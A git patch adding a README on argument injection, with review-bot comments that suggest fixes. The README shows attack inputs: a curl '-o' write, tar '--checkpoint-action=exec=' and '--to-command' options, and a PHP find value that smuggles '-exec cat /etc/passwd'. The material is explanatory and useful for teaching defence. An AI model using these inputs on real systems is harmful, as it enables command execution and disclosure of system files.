From 69c6ee87c68d7695ba8cbe13bdc7dcc56186777d Mon Sep 17 00:00:00 2001 From: gregory draperi Date: Thu, 6 Oct 2022 16:56:44 +0200 Subject: [PATCH 1/2] Argument Injection technique --- Argument Injection/README.md | 91 ++++++++++++++++++++++++++++++++++++ 1 file changed, 91 insertions(+) create mode 100644 Argument Injection/README.md diff --git a/Argument Injection/README.md b/Argument Injection/README.md new file mode 100644 index 0000000..04f7ea1 --- /dev/null +++ b/Argument Injection/README.md 
@@ -0,0 +1,91 @@ +# Argument Injection +Argument injection is similar to command injection as tainted data is passed to to a command executed in a shell without proper sanitization/escaping. + +It can happen in different situations, where you can only inject arguments to a command: + +- Improper sanitization (regex) +- Injection of arguments into a fixed command (PHP:escapeshellcmd, Python: Popen) +- Bash expansion (ex: *) + +In the following example, a python script takes the inputs from the command line to generate a ```curl``` command: +``` +from shlex import quote,split +import sys +import subprocess + +if __name__=="__main__": + command = ['curl'] + command = command + split(sys.argv[1]) + print(command) + r = subprocess.Popen(command) +``` +It is possible for an attacker to pass several words to abuse options from ```curl``` command +``` +python python_rce.py "https://www.google.fr -o test.py" +``` +We can see by printing the command that all the parameters are splited allowing to inject an argument that will save the response in an arbitrary file. +``` +['curl', 'https://www.google.fr', '-o', 'test.py'] +``` +## Summary + +* [List of exposed commands](#List of exposed commands) + * [TAR](#TAR) + * [CURL](#CURL) + * [WGET](#WGET) +* [References](#references) + + +## List of exposed commands + +### CURL +It is possible to abuse ```curl``` through the following options: + +``` + -o, --output Write to file instead of stdout + -O, --remote-name Write output to a file named as the remote file +``` +In case there is already one option in the command it is possible to inject several URLs to download and several output options. Each option will affect each URL in sequence. + +### TAR +For the ```tar``` command it is possible to inject arbitrary arguments in different commands. 
+ +Argument injection can happen into the '''extract''' command: +``` +--to-command +--checkpoint=1 --checkpoint-action=exec= +-T or --files-from +``` + +Or in the '''create''' command: +``` +-I= or -I +--use-compres-program= +``` +There are also short options to work without spaces: +``` +-T +-I"/path/to/exec" +``` + +### FIND +Find some_file inside /tmp directory. +``` +$file = "some_file"; +system("find /tmp -iname ".escapeshellcmd($file)); +``` + +Print /etc/passwd content. +``` +$file = "sth -or -exec cat /etc/passwd ; -quit"; +system("find /tmp -iname ".escapeshellcmd($file)); +``` + + +## References + + +- [staaldraad - Etienne Stalmans, November 24, 2019](https://staaldraad.github.io/post/2019-11-24-argument-injection/) +- [Back To The Future: Unix Wildcards Gone Wild - Leon Juranic, 06/25/2014] (https://www.exploit-db.com/papers/33930) +- [TL;DR: How exploit/bypass/use PHP escapeshellarg/escapeshellcmd functions - kacperszurek, Apr 25, 2018] (https://github.com/kacperszurek/exploits/blob/master/GitList/exploit-bypass-php-escapeshellarg-escapeshellcmd.md) + From ba9eb30940f17bd0b2fc6b9e416a3ea43de66ee8 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Thu, 6 Oct 2022 17:55:16 +0200 Subject: [PATCH 2/2] Fix links --- Argument Injection/README.md | 26 ++++++++++++-------------- 1 file changed, 12 insertions(+), 14 deletions(-) diff --git a/Argument Injection/README.md b/Argument Injection/README.md index 04f7ea1..acaa3b7 100644 --- a/Argument Injection/README.md +++ b/Argument Injection/README.md @@ -8,7 +8,7 @@ It can happen in different situations, where you can only inject arguments to a - Bash expansion (ex: *) In the following example, a python script takes the inputs from the command line to generate a ```curl``` command: -``` +```py from shlex import quote,split import sys import subprocess 
@@ -20,16 +20,16 @@ if __name__=="__main__": r = subprocess.Popen(command) ``` It is possible for an attacker to pass several words to abuse options from ```curl``` command -``` +```ps1 python python_rce.py "https://www.google.fr -o test.py" ``` We can see by printing the command that all the parameters are splited allowing to inject an argument that will save the response in an arbitrary file. -``` +```ps1 ['curl', 'https://www.google.fr', '-o', 'test.py'] ``` ## Summary -* [List of exposed commands](#List of exposed commands) +* [List of exposed commands](#list-of-exposed-commands) * [TAR](#TAR) * [CURL](#CURL) * [WGET](#WGET) @@ -41,7 +41,7 @@ We can see by printing the command that all the parameters are splited allowing ### CURL It is possible to abuse ```curl``` through the following options: -``` +```ps1 -o, --output Write to file instead of stdout -O, --remote-name Write output to a file named as the remote file ``` @@ -51,32 +51,32 @@ In case there is already one option in the command it is possible to inject seve For the ```tar``` command it is possible to inject arbitrary arguments in different commands. Argument injection can happen into the '''extract''' command: -``` +```ps1 --to-command --checkpoint=1 --checkpoint-action=exec= -T or --files-from ``` Or in the '''create''' command: -``` +```ps1 -I= or -I --use-compres-program= ``` There are also short options to work without spaces: -``` +```ps1 -T -I"/path/to/exec" ``` ### FIND Find some_file inside /tmp directory. -``` +```php $file = "some_file"; system("find /tmp -iname ".escapeshellcmd($file)); ``` Print /etc/passwd content. -``` +```php $file = "sth -or -exec cat /etc/passwd ; -quit"; system("find /tmp -iname ".escapeshellcmd($file)); ``` 
@@ -84,8 +84,6 @@ system("find /tmp -iname ".escapeshellcmd($file)); ## References - - [staaldraad - Etienne Stalmans, November 24, 2019](https://staaldraad.github.io/post/2019-11-24-argument-injection/) -- [Back To The Future: Unix Wildcards Gone Wild - Leon Juranic, 06/25/2014] (https://www.exploit-db.com/papers/33930) -- [TL;DR: How exploit/bypass/use PHP escapeshellarg/escapeshellcmd functions - kacperszurek, Apr 25, 2018] (https://github.com/kacperszurek/exploits/blob/master/GitList/exploit-bypass-php-escapeshellarg-escapeshellcmd.md) - +- [Back To The Future: Unix Wildcards Gone Wild - Leon Juranic, 06/25/2014](https://www.exploit-db.com/papers/33930) +- [TL;DR: How exploit/bypass/use PHP escapeshellarg/escapeshellcmd functions - kacperszurek, Apr 25, 2018](https://github.com/kacperszurek/exploits/blob/master/GitList/exploit-bypass-php-escapeshellarg-escapeshellcmd.md)
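Review bot: the new-file hunk `@@ -0,0 +1,91 @@` in PATCH 1/2 describes the attack but never names the defect or the fix, which is what a reader maintaining such code needs: the bug is `split(sys.argv[1])`, which turns one caller-supplied value into several argv entries, and the safe shape is to pass it as exactly one element (`command + [sys.argv[1]]`) behind curl's end-of-options marker `--`, or to reject values that start with `-` before they reach the command. One sentence to that effect after the `['curl', 'https://www.google.fr', '-o', 'test.py']` output would close the section. Smaller points in the same hunk: `quote` is imported from `shlex` but never used; `passed to to a command` doubles a word and `splited` should be `split`; and the Summary lists `[WGET](#WGET)` although no WGET section exists, while the `### FIND` section that does exist is not listed.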
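Review bot: the Summary fix in `@@ -20,16 +20,16 @@` of PATCH 2/2 is incomplete: only `#list-of-exposed-commands` is lowercased, while `[TAR](#TAR)`, `[CURL](#CURL)` and `[WGET](#WGET)` keep uppercase anchors that GitHub's generated heading ids (`#tar`, `#curl`, `#wget`) do not match, so those three links still go nowhere (and `WGET` has no target section at all). The `ps1` tag added to the `python python_rce.py "https://www.google.fr -o test.py"` line and to the printed `['curl', ...]` list is also the wrong language: the first is a POSIX shell invocation (`sh` or `bash`), the second is Python list output (`py` or an untagged fence), and PowerShell highlighting will render the quoting misleadingly.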
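Review bot: the `@@ -51,32 +51,32 @@` hunk of PATCH 2/2 retags the tar and find blocks but leaves two content errors visible in its own context lines that this cleanup should take along: `--use-compres-program=` is a typo for tar's actual `--use-compress-program=`, and `'''extract'''` / `'''create'''` are MediaWiki bold markers that Markdown renders literally, so `**extract**` / `**create**` is intended. `ps1` is again a mismatch for GNU option listings; `bash` or a plain fence fits. The `php` tag on the FIND examples is right, but the section never says why `escapeshellcmd()` fails here: it escapes shell metacharacters yet leaves spaces untouched, so the value is still split into several `find` arguments. A closing line pointing readers to `escapeshellarg()`, which wraps the whole value in single quotes so it reaches `find` as a single `-iname` pattern, would give the section its mitigation.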
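Review bot: the reference fix in `@@ -84,8 +84,6 @@` of PATCH 2/2 is correct (removing the space between `]` and `(` is what makes the two Markdown links render), but while touching these lines the date formats could be made consistent: the entries mix `November 24, 2019`, `06/25/2014` and `Apr 25, 2018`, and one style across the three would read cleaner.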